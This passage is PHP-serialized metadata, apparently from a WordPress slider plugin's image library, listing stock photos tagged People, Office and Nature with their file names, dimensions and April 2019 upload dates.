File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1275\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:157;a:12:{s:2:\"id\";s:3:\"442\";s:6:\"handle\";s:25:\"Looking-at-the-window.jpg\";s:4:\"name\";s:21:\"Looking at the window\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:158;a:12:{s:2:\"id\";s:3:\"441\";s:6:\"handle\";s:48:\"woman-standing-near-buildings-during-daytime.jpg\";s:4:\"name\";s:44:\"woman standing near buildings during daytime\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1278\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:159;a:12:{s:2:\"id\";s:3:\"440\";s:6:\"handle\";s:12:\"Lollipop.jpg\";s:4:\"name\";s:8:\"Lollipop\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1395\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:160;a:12:{s:2:\"id\";s:3:\"439\";s:6:\"handle\";s:26:\"People-crossing-street.jpg\";s:4:\"name\";s:22:\"People crossing street\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1278\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:161;a:12:{s:2:\"id\";s:3:\"438\";s:6:\"handle\";s:24:\"Friends-on-the-shore.jpg\";s:4:\"name\";s:20:\"Friends on the shore\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:162;a:12:{s:2:\"id\";s:3:\"437\";s:6:\"handle\";s:13:\"Coworkers.jpg\";s:4:\"name\";s:9:\"Coworkers\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:163;a:12:{s:2:\"id\";s:3:\"436\";s:6:\"handle\";s:27:\"Hiking-in-the-Dolomites.jpg\";s:4:\"name\";s:23:\"Hiking in the Dolomites\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:164;a:12:{s:2:\"id\";s:3:\"435\";s:6:\"handle\";s:18:\"Successful-man.jpg\";s:4:\"name\";s:14:\"Successful man\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:165;a:12:{s:2:\"id\";s:3:\"434\";s:6:\"handle\";s:23:\"Beautiful-sunny-day.jpg\";s:4:\"name\";s:19:\"Beautiful sunny day\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:166;a:12:{s:2:\"id\";s:3:\"433\";s:6:\"handle\";s:8:\"Guys.jpg\";s:4:\"name\";s:4:\"Guys\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:167;a:12:{s:2:\"id\";s:3:\"432\";s:6:\"handle\";s:19:\"Confetti-Shower.jpg\";s:4:\"name\";s:15:\"Confetti Shower\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:168;a:12:{s:2:\"id\";s:3:\"431\";s:6:\"handle\";s:24:\"Sun-was-setting-down.jpg\";s:4:\"name\";s:20:\"Sun was setting down\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:169;a:12:{s:2:\"id\";s:3:\"430\";s:6:\"handle\";s:9:\"Jumps.jpg\";s:4:\"name\";s:5:\"Jumps\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:170;a:12:{s:2:\"id\";s:3:\"429\";s:6:\"handle\";s:23:\"Friends-by-the-fire.jpg\";s:4:\"name\";s:19:\"Friends by the fire\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:171;a:12:{s:2:\"id\";s:3:\"428\";s:6:\"handle\";s:21:\"Under-the-blanket.jpg\";s:4:\"name\";s:17:\"Under the blanket\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1413\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:172;a:12:{s:2:\"id\";s:3:\"427\";s:6:\"handle\";s:18:\"Pretty-in-Pink.jpg\";s:4:\"name\";s:14:\"Pretty in Pink\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1394\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:173;a:12:{s:2:\"id\";s:3:\"426\";s:6:\"handle\";s:31:\"Discussions-at-a-long-table.jpg\";s:4:\"name\";s:27:\"Discussions at a long table\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1268\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:174;a:12:{s:2:\"id\";s:3:\"425\";s:6:\"handle\";s:18:\"Lost-in-Lemons.jpg\";s:4:\"name\";s:14:\"Lost in Lemons\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:175;a:12:{s:2:\"id\";s:3:\"424\";s:6:\"handle\";s:13:\"Team-work.jpg\";s:4:\"name\";s:9:\"Team work\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:176;a:12:{s:2:\"id\";s:3:\"423\";s:6:\"handle\";s:20:\"Romantic-evening.jpg\";s:4:\"name\";s:16:\"Romantic evening\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1263\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:177;a:12:{s:2:\"id\";s:3:\"422\";s:6:\"handle\";s:19:\"Crew-collective.jpg\";s:4:\"name\";s:15:\"Crew collective\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1278\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:178;a:12:{s:2:\"id\";s:3:\"421\";s:6:\"handle\";s:8:\"Code.jpg\";s:4:\"name\";s:4:\"Code\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:179;a:12:{s:2:\"id\";s:3:\"420\";s:6:\"handle\";s:48:\"Yellow-ceramic-mug-beside-gray-aluminum-iMac.jpg\";s:4:\"name\";s:44:\"Yellow ceramic mug beside gray aluminum iMac\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:180;a:12:{s:2:\"id\";s:3:\"419\";s:6:\"handle\";s:11:\"My-desk.jpg\";s:4:\"name\";s:7:\"My desk\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1315\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:181;a:12:{s:2:\"id\";s:3:\"418\";s:6:\"handle\";s:17:\"Cooperation-2.jpg\";s:4:\"name\";s:13:\"Cooperation 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:182;a:12:{s:2:\"id\";s:3:\"417\";s:6:\"handle\";s:33:\"MacBook-on-top-of-brown-table.jpg\";s:4:\"name\";s:29:\"MacBook on top of brown table\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:183;a:12:{s:2:\"id\";s:3:\"416\";s:6:\"handle\";s:27:\"Beautiful-working-place.jpg\";s:4:\"name\";s:23:\"Beautiful working place\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:184;a:12:{s:2:\"id\";s:3:\"415\";s:6:\"handle\";s:14:\"Typewriter.jpg\";s:4:\"name\";s:10:\"Typewriter\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:185;a:12:{s:2:\"id\";s:3:\"414\";s:6:\"handle\";s:19:\"White-desk-lamp.jpg\";s:4:\"name\";s:15:\"White desk lamp\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:186;a:12:{s:2:\"id\";s:3:\"413\";s:6:\"handle\";s:18:\"Office-working.jpg\";s:4:\"name\";s:14:\"Office working\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:187;a:12:{s:2:\"id\";s:3:\"412\";s:6:\"handle\";s:36:\"Silver-iMac-on-brown-wooden-desk.jpg\";s:4:\"name\";s:32:\"Silver iMac on brown wooden desk\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1240\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:188;a:12:{s:2:\"id\";s:3:\"411\";s:6:\"handle\";s:23:\"Working-in-progress.jpg\";s:4:\"name\";s:19:\"Working in progress\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:189;a:12:{s:2:\"id\";s:3:\"410\";s:6:\"handle\";s:15:\"Cooperation.jpg\";s:4:\"name\";s:11:\"Cooperation\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:190;a:12:{s:2:\"id\";s:3:\"409\";s:6:\"handle\";s:17:\"Working-place.jpg\";s:4:\"name\";s:13:\"Working place\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:191;a:12:{s:2:\"id\";s:3:\"408\";s:6:\"handle\";s:16:\"Working-desk.jpg\";s:4:\"name\";s:12:\"Working desk\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:192;a:12:{s:2:\"id\";s:3:\"407\";s:6:\"handle\";s:23:\"low-angle-of-forest.jpg\";s:4:\"name\";s:19:\"low angle of forest\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:193;a:12:{s:2:\"id\";s:3:\"406\";s:6:\"handle\";s:23:\"Lake-under-blue-sky.jpg\";s:4:\"name\";s:19:\"Lake under blue sky\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1351\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:194;a:12:{s:2:\"id\";s:3:\"405\";s:6:\"handle\";s:21:\"Blue-starry-night.jpg\";s:4:\"name\";s:17:\"Blue starry night\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:195;a:12:{s:2:\"id\";s:3:\"404\";s:6:\"handle\";s:22:\"Aerial-photography.jpg\";s:4:\"name\";s:18:\"Aerial photography\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1440\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:196;a:12:{s:2:\"id\";s:3:\"403\";s:6:\"handle\";s:14:\"Red-clouds.jpg\";s:4:\"name\";s:10:\"Red clouds\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:197;a:12:{s:2:\"id\";s:3:\"402\";s:6:\"handle\";s:14:\"Snow-field.jpg\";s:4:\"name\";s:10:\"Snow field\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1227\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:198;a:12:{s:2:\"id\";s:3:\"401\";s:6:\"handle\";s:13:\"White-sky.jpg\";s:4:\"name\";s:9:\"White sky\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:199;a:12:{s:2:\"id\";s:3:\"400\";s:6:\"handle\";s:24:\"Trees-covered-by-fog.jpg\";s:4:\"name\";s:20:\"Trees covered by fog\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1277\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:200;a:12:{s:2:\"id\";s:3:\"399\";s:6:\"handle\";s:26:\"Red-and-white-mushroom.jpg\";s:4:\"name\";s:22:\"Red and white mushroom\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:201;a:12:{s:2:\"id\";s:3:\"398\";s:6:\"handle\";s:24:\"Lake-near-pine-trees.jpg\";s:4:\"name\";s:20:\"Lake near pine trees\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New 